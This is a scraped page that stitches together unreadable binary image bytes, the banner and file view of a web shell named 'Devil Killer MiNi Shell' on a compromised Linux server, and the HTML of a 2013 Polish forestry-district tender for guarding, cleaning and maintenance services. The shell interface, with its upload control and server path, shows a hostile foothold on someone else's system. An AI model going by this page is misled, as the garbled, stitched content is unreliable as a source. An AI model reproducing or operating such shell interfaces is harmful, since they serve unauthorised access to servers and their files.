JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130214/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130214/62368-N-2013.html

<p class="kh_header"><b>Rudziniec: Kompleksowa obsługa administracyjna siedziby Nadleśnictwa Rudziniec</b><br>
<b>Numer ogłoszenia: 62368 - 2013; data zamieszczenia: 14.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> PGL LP Nadleśnictwo Rudziniec , ul. Leśna 4, 44-160 Rudziniec, woj. śląskie, tel. 032 230 03 176, faks 032 332 63 47.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Skarbu Państwa nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa obsługa administracyjna siedziby Nadleśnictwa Rudziniec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A.Dozór i stróżowanie w okresie od 01 kwiecień 2013 r. do 31marzec 2014 r.
Całkowita  powierzchnia kompleksu budynków Nadleśnictwa Rudziniec zlokalizowanych w Rudzińcu przy ul. Leśnej 7 wynosi: 22 185 m2. Kompleks ten stanowi teren usytuowany z dala od terenów mieszkalnych. Teren ten jest w całości ogrodzony płotem z paneli ogrodzeniowych ażurowych, oświetlony za pomocą lamp oraz objęty monitoringiem zewnętrznym w postaci kamer. Na teren prowadzą dwa wjazdy jeden od strony lasu -brama wjazdowa techniczna oraz drugi: brama główna wjazdowa - od strony drogi publicznej.Na terenie kompleksu znajdują się następujące obiekty 
 budynek biurowy  w skład którego wchodzą 
   segment Nr I - biurowy
   segment Nr II - łącznik stanowiący m.in. część sanitarną
   segment III - edukacyjny
budynek gospodarczy
 wieża p.pożarowa (poza ogrodzeniem)
W ramach zamówienia Wykonawca własnym kosztem i staraniem zorganizuje ochronę obiektów z wykorzystaniem jednego pomieszczenia (udostępnionego przez Zamawiającego) oraz systemu monitoringu technicznego w postaci kamer.
Dozór wraz ze stróżowaniem odbywać się będzie w godzinach od 15.00 dnia bieżącego do 07.00 dnia następnego w dni robocze. W dni  wolne od pracy i święta dozór odbywać się będzie całodobowo.
        Dozór  polegać będzie na :
           stałym patrolowaniu całego terenu
          ochronie mienia i budynków znajdujących się na terenie kompleksu .
 1. Do zadań w  zakresie  dozorowania i stróżowania należy w szczególności :
ciągłe, aktywne przebywanie osób dozorujących na terenie podlegającemu ochronie
 stałe patrolowanie całego terenu i budynków poprzez obchód  i system telewizji dozorowej - pomieszczenie zabezpieczone przez Zamawiającego dla osoby pełniącej dozór, wyposażone w monitor zbierający obraz z kamer usytuowanych na terenie kompleksu
 zapobieganie włamaniom, kradzieżom i dewastacjom mienia Nadleśnictwa Rudziniec - sprawdzenie zabezpieczenia zewnętrznego budynków,
 sprawdzenie zamknięcia okien oraz wyłączenia zbędnego oświetlenia,
 uniemożliwienie wtargnięcia i przebywania na terenie ochranianym osobom nieuprawnionym,
 nadzór nad parkingami i zaparkowanymi pojazdami ,
 informowanie na bieżąco pracowników  Nadleśnictwa o zaistniałych nieprawidłowościach , usterkach - w sposób określony w trakcie realizacji zamówienia  przez Zamawiającego
2. Uprawnienia Zamawiającego  w stosunku do Wykonawcy zadania :
    Prowadzenie kontroli realizacji zadań dozoru obiektu  i mienia - przez niżej    wymienione  osoby:
	Nadleśniczy ,
	Zastępca Nadleśniczego,
	Sekretarz Biura , 
	pracownicy Straży Leśnej Nadleśnictwa .
Ww.  osoby mają prawo :
	dokonywać kontroli pełnienia  dozoru  o każdej porze dnia i nocy,
	przekazywać uwagi kontrolowanym osobom  dozorującym na stwierdzone niedociągnięcia  w czasie pełnionego dozoru,
	żądać od Wykonawcy natychmiastowego usunięcia stwierdzonych w wyniku kontroli - niedociągnięć i nieprawidłowości ,
3. Osobą odpowiedzialną bezpośrednio za ochraniane obiekty ze strony Nadleśnictwa Rudziniec - jest Sekretarz Biura .

4.  Nadleśnictwo jako Zamawiający  zastrzega sobie że:
  Wykonawca  zapewni  osobom pełniącym funkcje dozoru    odpowiednie jednolite ubranie służbowe oraz identyfikatory,
Wykonawca zapewni  osobom pełniącym funkcje dozoru łączność telefoniczną GSM z odpowiednimi służbami i pracownikami Nadleśnictwa.

        B. Sprzątanie: w okresie od: 1.04.2013 r. do 31.03.2014 r.

1. W  zakres sprzątania wchodzi kompleks budynków siedziby Nadleśnictwa składający się z :
a.  budynek biurowy tj. segment I, II. III
b.  budynek gospodarczy

Ad . a. budynek biurowy :
            segment Nr I (parter + piętro) 
             pow. użytkowa: 539,14 m2
            segment Nr II  - łącznik (parter)
             pow. użytkowa: 134,72 m2
            segment Nr III - edukacyjny (parter + pomost techniczny) pow. użytkowa:169,93 m2

Ad. b. budynek gospodarczy
             segment Nr IV - pomieszczenia Straży Leśnej + pomieszczenia magazynowe
              pow. użytkowa: 272,21 m2

Całkowita powierzchnia użytkowa  budynków siedziby Nadleśnictwa wynosi 1 116 m2.

2. Do zadań w  zakresie  sprzątania  należy w szczególności :

	codzienne odkurzanie, mycie  i konserwacja podłóg oraz schodów,
	mycie wykafelkowanych  powierzchni ścian w łazienkach - w miarę potrzeb
	codzienne czyszczenie mebli łącznie z ich konserwacją,
	utrzymanie w czystości  telefonów,
	mycie okien (przynajmniej raz na 2 miesiące),
	codzienne mycie luster, umywalek, baterii, kabin natryskowych, muszli klozetowych
i pisuarów w łazienkach,
	utrzymanie w czystości aneksów kuchennych, drzwi, tablic informacyjnych, parapetów okiennych, rolet okiennych, dywanów i tapicerki meblowej ,
	codzienne opróżnianie, mycie koszy na  śmieci i popielnicy w palarni oraz wymiana worków na śmieci ,
	codzienne opróżnianie pojemników niszczarek
	utrzymanie w czystości  gaśnic, grzejników, obrazów i innych elementów na ścianach ,
	odkurzanie, czyszczenie i mycie eksponatów i gablot w salach wystawienniczych po uprzednim uzgodnieniu z Zamawiającym,
	uzupełnienie na bieżąco  środków czystości w toaletach   ( mydło w płynie , środki zapachowe, ręczniki jednorazowe, papier toaletowy, płyn do WC ),
	uzupełnianie na bieżąco środków czystości w aneksach kuchennych ,
	bieżące usuwanie plam z dywanów,
	pranie dywanów i obić tapicerskich mebli , krzeseł i foteli  po uprzednim uzgodnieniu z Zamawiającym,
	bieżące czyszczenie klamek i kontaktów ,
	bieżące mycie i konserwacja drzwi drewnianych wewnętrznych i wejściowych ,
	bieżące mycie lodówek, kuchenek mikrofalowych, płyt grzewczych i innych urządzeń znajdujących się w aneksach kuchennych ,
	bieżące odkurzanie i przecieranie poręczy klatek schodowych,


 3. Sprzątanie pomieszczeń biura w dni robocze odbywać się będzie od godziny 15.00 

 4. Do wykonania w/w usług  Nadleśnictwo zastrzega sobie  stosowanie przez  Wykonawcę  następujących środków czystości :  
a. elementy drewniane ( podłogi  drewniane, parapety, meble itp. ) - konserwacja przy     użyciu  środka typu Pronto
b.	elementy drewnopodobne ( drzwi, meble, panele podłogowe itp.) - konserwacja  przy użyciu środka typu Pronto ( uwaga : nie do drewna ),
aneksy kuchenne :
c.	do mycia kuchenek elektrycznych należy stosować środek do płyt ceramicznych 
d.	do mycia zlewozmywaków stosować - środek nie powodujący zarysowań  ,
e.	mycie mebli  kuchennych - nie stosować środków powodujących zmatowienie powierzchni lub ich zarysowanie ,
f.	mycie w zmywarkach - stosować  proszek do zmywarek , sól , nabłyszczacz  - zgodnie z zaleceniami  producenta,
g.	podłogi  i ściany z powierzchnią ceramiczną - należy stosować środki , które nie
     powodują  zarysowań i  matowienia powierzchni .
Na wszystkie pozostałe środki , które będą stosowane  w celu realizacji umowy  Wykonawca musi uzyskać zgodę Nadleśnictwa .

5. Usługi objęte niniejszym  zakresem  Wykonawca  wykona przy użyciu własnych narzędzi 
( sprzętu )   środków utrzymania czystości , środków toaletowych i higieny osobistej .
Uwaga : do odkurzania pomieszczeń  należy używać sprzętu nie powodującego zapylenia powietrza ( stosować filtry wodne ).

C. Utrzymanie terenu: w okresie od 01.04.2013r. do 31.03.2014r.

1. Teren siedziby Nadleśnictwa składa się z:
 wybrukowanego  kostką betonową  placu  z miejscami parkingowymi
  oraz drogami dojazdowymi
 trawników
 terenów zieleni niskiej -krzewy.
Powierzchnia objętego umową placu, parkingów oraz dróg dojazdowych wynosi 3 427 m2.

2. Do zadań w  zakresie  bieżącego utrzymania terenu  w czystości należy w szczególności i w miarę potrzeb:

a.  zamiatanie placu , miejsc parkingowych oraz dróg dojazdowych,
b. odśnieżanie , zwalczanie śliskości zimowej , posypywanie powierzchni placu i dróg
    dojazdowych piaskiem , pryzmowanie śniegu ,
c.  załadunek i wywóz śniegu, gdy pryzmowanie stanie się niewystarczające ,
d. usuwanie zanieczyszczeń wokół budynków , na placu oraz drogach dojazdowych
      tj. zamiatanie , grabienie i wywóz liści,
e.  czyszczenie z liści rynien i rur spustowych , 
f. oczyszczenie w razie konieczności  wizjerów  kamer znajdujących się na słupach
    wokół budynków,
 
3. Prace związane z utrzymaniem terenu odbywać się będą wyłącznie poza godzinami pracy biura Nadleśnictwa, przy pomocy własnych narzędzi i sprzętu.


D. Obsługa  i konserwacja urządzeń technicznych: w okresie od 01.04.2013 r. 
    do 31.03.2014 r.
    

Wykaz urządzeń wymagających konserwacji w zakresie ich użytkowania:

1. Brama wjazdowa główna:
     obsługa mechanizmu przesuwu, siłownika (ogólna obsługa otwierania i zamykania)
      konserwacja mechanizmów - w miarę potrzeb,
2. Bramy garażowe:
     obsługa otwierania i zamykania, przegląd i konserwacja mechanizmów - w miarę 
      potrzeb,
3.  Instalacja wentylacji:
      przeglądy i czyszczenie filtrów i przepustnic - na bieżąco lecz nie rzadziej 
       niż co dwa tygodnie,
4. Instalacja pomp ciepła, C.O. i klimatyzacji
      wymiana styczników, bezpieczników, przekaźników,
      programowanie regulatora pompy ciepła,
      sprawdzanie, zgłaszanie ewentualnych awarii - na bieżąco,
5. Zbiornik akumulacyjny ciepła GALMET
    sprawdzanie działania zaworu bezpieczeństwa  -  na bieżąco,
6. Pompy Grundfos:
    bieżąca kontrola,
7. Klimatyzatory kasetonowe:
    kontrola i czyszczenie filtrów powietrza - co najmniej dwa razy w roku,
8.Membranowy zawór bezpieczeństwa:
    kontrola przez przeszkolonego instalatora co najmniej raz w roku,
9. Wymienniki płytowe:
    przeglądy na bieżąco,
10. Separator koalestencyjny ze zintegrowanym osadnikiem i wewnętrznym kanałem
      odciążającym:
      kontrola grubości warstwy oleju w zbiorniku separatora - co miesiąc
     kontrola grubości warstwy osadu w komorze osadowej - co miesiąc,
      kontrola zamknięcia pływakowego - co miesiąc,
      kontrola podtopienia kanału dopływowego - co kwartał
      kontrola stanu zanieczyszczeń zbiornika - jeden raz w roku
      zgłaszanie Zamawiającemu o konieczności usunięcia osadów
      przegląd i konserwacja dmuchawy napowietrzającej,
11. Branża elektryczna:
      kontrola: agregatu prądotwórczego, rozdzielnicy głównej RG, baterii kondensatorów
       BK-T-95, kamer, centrali alarmowej, pilotów zdalnego sterowania.
       Uwaga: przy obsłudze urządzeń elektrycznych wymagane są uprawnienia SEP.


Wszystkie w/w urządzenia wymagają od firm lub osób które będą zajmowały się ich 
okresowymi przeglądami i konserwacją - zapoznania się z instrukcjami obsługi,
użytkowania i konserwacji.
Winno to nastąpić przed złożeniem ofert do przetargu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.61.20.00-0, 90.61.10.00-3, 90.62.00.00-9, 90.63.00.00-2, 90.91.40.00-7, 50.72.10.00-5, 50.32.21.00-1, 50.76.00.00-0, 51.31.00.00-8, 90.91.92.00-4, 98.34.11.20-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 11.1	Warunkiem udziału w postępowaniu jest zabezpieczenie oferty wadium, którego wysokość wynosi 3 000,00 zł.
11.2	Wadium może być wniesione w jednej lub kilku następujących formach: 
11.2.1	pieniądzu,
11.2.2	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
11.2.3	gwarancjach bankowych,
11.2.4	gwarancjach ubezpieczeniowych,
11.2.5	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 42/2007, poz. 275 z późn. zmianami).
11.3	Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy 
nr konta 23 8457 0008 2011 0056 9392 0003
z dopiskiem na blankiecie przelewu S-2710-1/2013
11.4	Wadium wnoszone w formie: poręczenia bankowego, poręczenia spółdzielczej kasy oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy złożyć w Nadleśnictwie - Sekretariat, pok. nr 1.10 w terminie do dnia 25.02.2013r. 
do godz. 9:00
11.5	Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy oraz pkt. 11.12 SIWZ.
11.6	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym w pkt. 11.4. terminie znajdzie się na rachunku bankowym Zamawiającego. 
11.7	Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą. 
11.8	Wadium dla konsorcjum może być wniesione przez lidera konsorcjum lub przez innego uczestnika konsorcjum (konsorcjanta). 
11.9	Dyspozycję w zakresie zwrotu wniesionych w pieniądzu wadiów Zamawiający przekaże do banku niezwłocznie po: 
11.9.1	wyborze oferty najkorzystniejszej,
11.9.2	zawarciu umowy w sprawie zamówienia publicznego
11.9.3	unieważnieniu postępowania o udzielenie niniejszego zamówienia publicznego
11.10	Zamawiający niezwłocznie dokona zwrotu wadium na wniosek Wykonawcy: 
11.10.1	 który wycofał ofertę przed upływem terminu składania ofert,
11.11	Wadium Wykonawcy, którego oferta została wybrana, przepada na rzecz Zamawiającego wraz z odsetkami w przypadku, gdy Wykonawca: 
11.11.1	odmówi podpisania umowy na warunkach określonych w ofercie,
11.11.2	zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy,
11.11.3	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
11.11.4	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
11.12	Wadium wniesione w pieniądzu, Zamawiający przechowa na rachunku bankowym i zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą Wykonawcy nie wykluczeni na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity z dnia 8 czerwca 2010 Dz. U. Nr 113, poz.759) oraz spełniający warunki zawarte w art. 22 ust. 1 w/w ustawy, a więc:
1)  posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2)  posiadania wiedzy i doświadczenia;
3)  dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4)  sytuacji ekonomicznej i finansowej.
7.2	Celem spełnienia warunku zawartego art. 22 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Wykonawca musi wykazać, iż: 
a)	posiada środki finansowe lub zdolność kredytową na kwotę minimum 100 000 zł; 
b)	ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 1 mln zł.
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia / nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w rozdz. 8 SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Informacje dotyczące sytuacji Wykonawcy oraz informacje i formalności niezbędne do oceny czy spełnia on minimalne wymogi ekonomiczne, finansowe i techniczne określa SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Informacje dotyczące sytuacji Wykonawcy oraz informacje i formalności niezbędne do oceny czy spełnia on minimalne wymogi ekonomiczne, finansowe i techniczne określa SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Informacje dotyczące sytuacji Wykonawcy oraz informacje i formalności niezbędne do oceny czy spełnia on minimalne wymogi ekonomiczne, finansowe i techniczne określa SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Informacje dotyczące sytuacji Wykonawcy oraz informacje i formalności niezbędne do oceny czy spełnia on minimalne wymogi ekonomiczne, finansowe i techniczne określa SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

